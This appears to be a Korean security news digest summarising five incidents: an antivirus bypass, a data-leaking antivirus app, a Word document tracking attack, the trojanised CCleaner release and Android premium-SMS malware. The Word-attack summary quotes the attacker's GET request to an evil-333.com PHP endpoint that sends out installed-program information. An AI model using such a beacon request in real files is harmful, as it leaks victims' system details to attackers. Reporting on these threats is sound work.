Team Parma

CyberArk의 연구팀은 윈도우즈 디펜더를 우회하는 "Illusion Gap" 공격을 공개했다. 해당 공격은 커스텀 SMB서버를 이용하여 실제 검사하는 프로그램과 실행하는 프로그램을 다르게 인식하도록 하여 윈도우즈 디펜더를 우회했다. 자세한 정보 - https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/ 출처: CyberArk's Blog, Illusion Gap - Antivirus Bypass Part 1

Check Point Security에서 총 천만에서 오천만건의 다운로드를 기록한 구글 플레이에 등록된 앱인 DU 안티바이러스 시큐리티 (DU Antivirus Security) 앱이 설치된 기기의 정보, 연락처, 전화 기록, 그리고 위치 정보 까지 유출하였다는 보고서를 공개했다. Check Point Security에 따르면, DU 안티바이러스 시큐리티 앱은 해당 정보를 빼돌려 같은 회사 (DU 그룹) 에서 개발한 발신자 정보 제공 앱 (Caller ID & Call Block - DU Caller) 을 위해 사용했으며 Check Point Security는 안티 바이러스 앱은 개인정보 보호를 위해 사용되는데, 이 앱은 정확하게 반대의 일을 했다고 주장했다. 사용자들이 안티바이러스 프로그램을 다운받을때..

카스퍼스키 랩 연구원들이 마이크로소프트 워드 문서를 이용한 새로운 종류의 공격을 발견했다. 이 공격은 기존의 공격과 달리 매크로, 익스플로잇 등 액티브 컨텐츠들을 이용하지 않기 때문에 사용자가 알아채기 힘든 것이 특징이다. 그들은 스팸 메일에 첨부된 문서들을 분석하는 도중에 이 공격법을 발견하였으며, 해당 문서들은 OLE2 포맷으로 되어있었고 PHP로 쓰여진 서드파티 웹서버로 접속하는 코드가 첨부되어 있었다. 해당 문서를 열면 컴퓨터에 설치된 프로그램의 정보들이 해당 링크를 통해 전송되는 것을 확인했다고 한다. 연구원들에 따르면, 문서를 열 경우 아래와 같은 GET Request를 한다. GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccc..

최근 아바스트(Avast)가 인수한 Piriform Utd. 의 CCleaner에서 악성코드가 발견되었다. 현재까지 약 2백만명이 다운로드 한 것으로 추정되며, 해당 유틸리티를 사용하는 사용자는 CCleaner를 최신 버전(v5.34) 으로 업데이트 해야 한다. Avast는 CCleaner가 자동 업데이트 되도록 패치한 상태이다. 사진: CCleaner의 로고 (출처: https://play.google.com/store/apps/details?id=com.piriform.ccleaner) CCleaner는 널리 사용되는 시스템을 정리용 소프트웨어로서 파일 삭제, 퍼포먼스 분석, 프로그램 관리기능 등을 제공한다. 감염이 확인된 버전은 8월 15일부터 9월 12일까지 배포된 CCleaner v5.33.61..

CheckPoint가 발견한 안드로이드 ExpensiveWall 악성코드는 SMS와 인터넷을 이용하여 프리미엄 서비스에 강제로 가입시키는 악성코드 이다. 구글 플레이의 정보에 따르면, 최소 50개의 앱이 감염되었고 백만건에서 사천 이백만건의 다운로드 횟수를 기록하였다. ExpensiveWall 악성코드는 다른 악성코드와는 다르게 패킹된 상태였기 때문에 구글 플레이의 안티 악성코드 프로그램에 의해 탐지되지 않았다. 현재 해당 앱들은 구글 플레이에서 삭제 되었다. 하지만 구글 플레이에서 삭제 되었다 하더라도 사용자가 이미 다운로드 한 경우 기기에 남아있을 수 있으니 주의 해야한다. ExpensiveWall 악성코드는 처음 설치시 사용자에게 SMS권한, 인터넷 권한을 요구한다. 이는 일반적인 앱들과 크게 다르..